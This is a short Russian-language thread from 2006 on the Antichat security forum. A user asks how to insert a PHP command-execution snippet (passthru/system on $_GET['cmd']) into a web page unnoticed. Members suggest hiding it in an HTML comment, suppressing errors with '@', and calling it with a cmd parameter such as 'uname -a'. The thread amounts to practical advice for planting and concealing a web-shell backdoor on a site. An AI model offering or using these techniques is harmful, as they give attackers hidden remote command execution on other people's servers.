HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Как незаметно вставить уязвимый код в страницу?
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Как незаметно вставить уязвимый код в страницу?
  #1  
Старый 01.07.2006, 01:11
mixas
Новичок
Регистрация: 15.01.2006
Сообщений: 10
Провел на форуме:
9353

Репутация: 0
По умолчанию Как незаметно вставить уязвимый код в страницу?
Требуется вставить код типа
Код:
<?passthru($_GET['cmd']);?>
Только чтобы на странице не высвечивалось сообщение о пустой команде.
Подскажите как лучше реализовать, можно ли например чтобы сообщение появлялось цветом фона.
 
Ответить с цитированием

  #2  
Старый 01.07.2006, 01:20
hidden
Постоянный
Регистрация: 23.04.2006
Сообщений: 622
Провел на форуме:
5887054

Репутация: 1292


По умолчанию
А что насчёт
PHP код:
<!--<?passthru($_GET)?>-->
 
Ответить с цитированием

  #3  
Старый 01.07.2006, 01:32
mixas
Новичок
Регистрация: 15.01.2006
Сообщений: 10
Провел на форуме:
9353

Репутация: 0
По умолчанию
Не хочет выполнять команды.
 
Ответить с цитированием

  #4  
Старый 01.07.2006, 01:33
hidden
Постоянный
Регистрация: 23.04.2006
Сообщений: 622
Провел на форуме:
5887054

Репутация: 1292


По умолчанию
А ты в сорцах смотрел?
 
Ответить с цитированием

  #5  
Старый 01.07.2006, 01:56
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию
как ты используешь ее?
вставляешь, например, в index.php <?passthru($_GET['cmd']);?>. потом пиши http://yopta.tvoy/index.php?cmd=uname -a и все должно работать..

hidden <!-- ... --> зачем брать в комменты?
__________________
ПИУ-ПИУ...
 
Ответить с цитированием

  #6  
Старый 01.07.2006, 02:03
hidden
Постоянный
Регистрация: 23.04.2006
Сообщений: 622
Провел на форуме:
5887054

Репутация: 1292


По умолчанию
Он сказал, что у него на странице выдаётся сообщение о пустой команде, я сделал чтоб, результат был только в сорцах.
 
Ответить с цитированием

  #7  
Старый 01.07.2006, 02:34
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию
Вобще-то молодые люди, существует символ @ чтоб в браузер не выводилось никаких ошибок..... например
@system($_GET['cmd']); вот и всё!!! Куда проще то?
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как вставить цветной текст в html страницу Trinux Болталка 5 13.05.2006 18:04
Как распознать код подтверждения при флуде? Macroeject Уязвимости CMS / форумов 10 06.04.2006 10:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.